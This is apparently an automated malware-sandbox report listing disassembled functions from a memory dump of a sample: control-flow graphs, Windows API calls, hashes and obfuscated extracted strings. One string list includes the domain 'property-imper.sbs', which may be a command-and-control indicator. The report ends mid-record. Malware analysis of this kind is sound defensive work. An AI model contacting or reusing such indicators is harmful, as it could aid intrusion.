                                Function 00FECF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 118 fecf05-fecf12 119 fecf20-fecf5c 118->119 119->119 120 fecf5e-fecfa5 call fe8930 call 1019030 119->120 125 fecfb0-fecffc 120->125 125->125 126 fecffe-fed06b 125->126 127 fed070-fed097 126->127 127->127 128 fed099-fed0aa 127->128 129 fed0ac-fed0b3 128->129 130 fed0cb-fed0d3 128->130 131 fed0c0-fed0c9 129->131 132 fed0eb-fed0f8 130->132 133 fed0d5-fed0d6 130->133 131->130 131->131 135 fed0fa-fed101 132->135 136 fed11b-fed123 132->136 134 fed0e0-fed0e9 133->134 134->132 134->134 137 fed110-fed119 135->137 138 fed13b-fed266 136->138 139 fed125-fed126 136->139 137->136 137->137 141 fed270-fed2ce 138->141 140 fed130-fed139 139->140 140->138 140->140 141->141 142 fed2d0-fed2ff 141->142 143 fed300-fed31a 142->143 143->143 144 fed31c-fed36b call feb960 143->144 147 fed370-fed3ac 144->147 147->147 148 fed3ae-fed3c5 call fe8930 call 1019030 147->148 152 fed3ca-fed3eb 148->152 153 fed3f0-fed43c 152->153 153->153 154 fed43e-fed4ab 153->154 155 fed4b0-fed4d7 154->155 155->155 156 fed4d9-fed4ea 155->156 157 fed4ec-fed4ef 156->157 158 fed4fb-fed503 156->158 159 fed4f0-fed4f9 157->159 160 fed51b-fed528 158->160 161 fed505-fed506 158->161 159->158 159->159 163 fed52a-fed531 160->163 164 fed54b-fed557 160->164 162 fed510-fed519 161->162 162->160 162->162 165 fed540-fed549 163->165 166 fed56b-fed696 164->166 167 fed559-fed55a 164->167 165->164 165->165 169 fed6a0-fed6fe 166->169 168 fed560-fed569 167->168 168->166 168->168 169->169 170 fed700-fed72f 169->170 171 fed730-fed74a 170->171 171->171 172 fed74c-fed791 call feb960 171->172
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: ()$+S7U$,_"Q$0C%E$64E9C36C5EF9ADA1D7CBBD6DF28D3732$7W"i$;[*]$<KuM$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                                • API String ID: 0-3957167144
                                • Opcode ID: 9aec5df8dca24529fd1585c591fa4566625f06bf43a836ef5196f4f89973a6d1
                                • Instruction ID: 19a08efd3f01cb842264c10aceda84a67a30c0563ab772dd1f7ce02341330fe7
                                • Opcode Fuzzy Hash: 9aec5df8dca24529fd1585c591fa4566625f06bf43a836ef5196f4f89973a6d1
                                • Instruction Fuzzy Hash: DB12FDB19483D18ED335CF26C495BEFBBE1ABD2304F28895CC4DA5B256C775090ACB92
                                Function 00FE89A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 203 fe89a0-fe89b1 call 101cb70 206 fe89b7-fe89cf call 1016620 203->206 207 fe8cb3-fe8cbb ExitProcess 203->207 211 fe8cae call 101deb0 206->211 212 fe89d5-fe89fb 206->212 211->207 216 fe89fd-fe89ff 212->216 217 fe8a01-fe8bda 212->217 216->217 219 fe8c8a-fe8ca2 call fe9ed0 217->219 220 fe8be0-fe8c50 217->220 219->211 225 fe8ca4 call fece80 219->225 221 fe8c56-fe8c88 220->221 222 fe8c52-fe8c54 220->222 221->219 222->221 227 fe8ca9 call feb930 225->227 227->211
                                APIs
                                • ExitProcess.KERNEL32(00000000), ref: 00FE8CB6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: d5ca0879f86ca9f20df572a4ea65a76b0e0908fb1c39b99e4ebbead5ae03bc19
                                • Instruction ID: 7c9a3dabfb4f8c04b8a51fa5ca1cf0ea033434d9a3eee0999258eec134d6a67c
                                • Opcode Fuzzy Hash: d5ca0879f86ca9f20df572a4ea65a76b0e0908fb1c39b99e4ebbead5ae03bc19
                                • Instruction Fuzzy Hash: F0710373B547054BC708DEBADC9236BFAD6ABC8710F09D83D6889D7390EAB89C054685
                                Function 0101DF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 234 101df70-101dfa2 LdrInitializeThunk
                                APIs
                                • LdrInitializeThunk.NTDLL(0101BA46,?,00000010,00000005,00000000,?,00000000,?,?,00FF9158,?,?,00FF19B4), ref: 0101DF9E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                Function 00FEBC9D Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 283 febc9d-febcaf 284 febcb0-febcc4 283->284 284->284 285 febcc6-febcd5 284->285 286 febcd8-febcf7 285->286
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fba9f5e9ab781c5ef5103ffe2beb59575daae2fcca16df9699a04c5a53c6ce4
                                • Instruction ID: cab227febc7d6cd5eb885d6c775ac057be281c10732ccd4d047eb4cc75967673
                                • Opcode Fuzzy Hash: 2fba9f5e9ab781c5ef5103ffe2beb59575daae2fcca16df9699a04c5a53c6ce4
                                • Instruction Fuzzy Hash: D2F0E2706083814BD3389F24D89167FB7A0AB82614F20581CE2C2C2282EA26D8029B09
                                Function 0101B7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 229 101b7e0-101b7ff 230 101b800-101b83d 229->230 230->230 231 101b83f-101b85b RtlAllocateHeap 230->231
                                APIs
                                • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0101B84E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 610ef365547786ec3303511f97fb63d0288c0f9504463240f9f43bb8c1091027
                                • Instruction ID: 95fe159ede45b7b171374853ea99d8d8fddd4589928ba7c47a237fa110b115fe
                                • Opcode Fuzzy Hash: 610ef365547786ec3303511f97fb63d0288c0f9504463240f9f43bb8c1091027
                                • Instruction Fuzzy Hash: 33019933A453080BC310AE7CDCD464AFBA6EFD9224F2A067CE5D4873D1DA32990AC395
                                Function 00FECEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 233 feceb3-fecee2 CoInitializeSecurity
                                APIs
                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FECEC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: InitializeSecurity
                                • String ID:
                                • API String ID: 640775948-0
                                • Opcode ID: 562d840d98b690879c3880451663e3794ba3204aa9cbd661476d54f64c419b0c
                                • Instruction ID: 03edf09ba887f1d623103f2aa4906f403a4af4f5f7670b94ff82bd82d85babb2
                                • Opcode Fuzzy Hash: 562d840d98b690879c3880451663e3794ba3204aa9cbd661476d54f64c419b0c
                                • Instruction Fuzzy Hash: 65D012353E434176F97489089C53F1422158706F64F341B08F772FE2C5C9D27181860C
                                Function 00FECE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 232 fece80-feceb0 CoInitializeEx
                                APIs
                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 00FECE93
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                • Opcode ID: 9a8ea77699c5139be966c94e9d9068e475934236c353a6ffd48dbfba26769c24
                                • Instruction ID: 1385b778583f182dec4800e8a98ceb34f2b3e813890f1411029c28e405ab8e1a
                                • Opcode Fuzzy Hash: 9a8ea77699c5139be966c94e9d9068e475934236c353a6ffd48dbfba26769c24
                                • Instruction Fuzzy Hash: 9FD0973029020873D130652CEC43F13322D8702710F000236FAA2CA1C2DD0BA800D2A1
                                Function 00FED7D3 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 265 fed7d3-fed7d8 CoUninitialize 266 fed7da-fed7e1 265->266
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: Uninitialize
                                • String ID:
                                • API String ID: 3861434553-0
                                • Opcode ID: 64aeb46c3d861ad367605df3357697c13ab63ba314a38faac42600e5e3056ba4
                                • Instruction ID: acf7891bfc92ee3b3070f7b803d85b244a826f9e464a46405b0878b8b697329a
                                • Opcode Fuzzy Hash: 64aeb46c3d861ad367605df3357697c13ab63ba314a38faac42600e5e3056ba4
                                • Instruction Fuzzy Hash: 6EA0113BB00008A88B0008A8BC020EEF328E28023AB00AAB3C22CC2000EA2202280280

                                Non-executed Functions

                                Function 01003D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                • API String ID: 1279760036-1524723224
                                • Opcode ID: 1c7cbf4841ab2834356bbe8495e6ff94ad948d2adedee6f399ba1a7d362eae98
                                • Instruction ID: 06cacb607fd0a6a87996dc862d22a93edeab96652e8ffded4d15c52d0a89c31b
                                • Opcode Fuzzy Hash: 1c7cbf4841ab2834356bbe8495e6ff94ad948d2adedee6f399ba1a7d362eae98
                                • Instruction Fuzzy Hash: 7D22AD7150C3808FE3628F28C0843AEBBE1AB95314F19896DE6D9C73D2D77A8845CB47
                                Function 00FE94D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                • API String ID: 0-1787199350
                                • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                • Instruction ID: 9552abe1343b651655e6d6080d583d4b210e1587bf44d719fd968c72732d35de
                                • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                • Instruction Fuzzy Hash: 2EB1D67050C3C18FD3158F2A80607ABBFE1AF97354F18496DE4D58B392D779890ADB62
                                Function 011B3F84 Relevance: 12.8, Strings: 9, Instructions: 1573COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576095665.000000000147B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1576121299.000000000147C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                Similarity
                                • API ID:
                                • String ID: "Im$7[]n$B*_y$KGQo$L?|$Ovuw$^_?O$z6<$m'
                                • API String ID: 0-618650539
                                • Opcode ID: 9b2a7a6b876066815d8e6fa8075736423892587b6f2e0dfdfc4f6a826a0bc4c9
                                • Instruction ID: 44452fd667556a69209bd9da27a59c5d99b804e112423a4cbefe7bb179de7deb
                                • Opcode Fuzzy Hash: 9b2a7a6b876066815d8e6fa8075736423892587b6f2e0dfdfc4f6a826a0bc4c9
                                • Instruction Fuzzy Hash: 2EB2F5F360C2049FE304AF29EC8567ABBE5EF94720F16493DEAC5C7344EA3598418697
                                Function 00FE98F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1575029298.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                • Associated: 00000000.00000002.1575005263.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575029298.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575097809.0000000001037000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.000000000129C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575121229.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1575755028.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
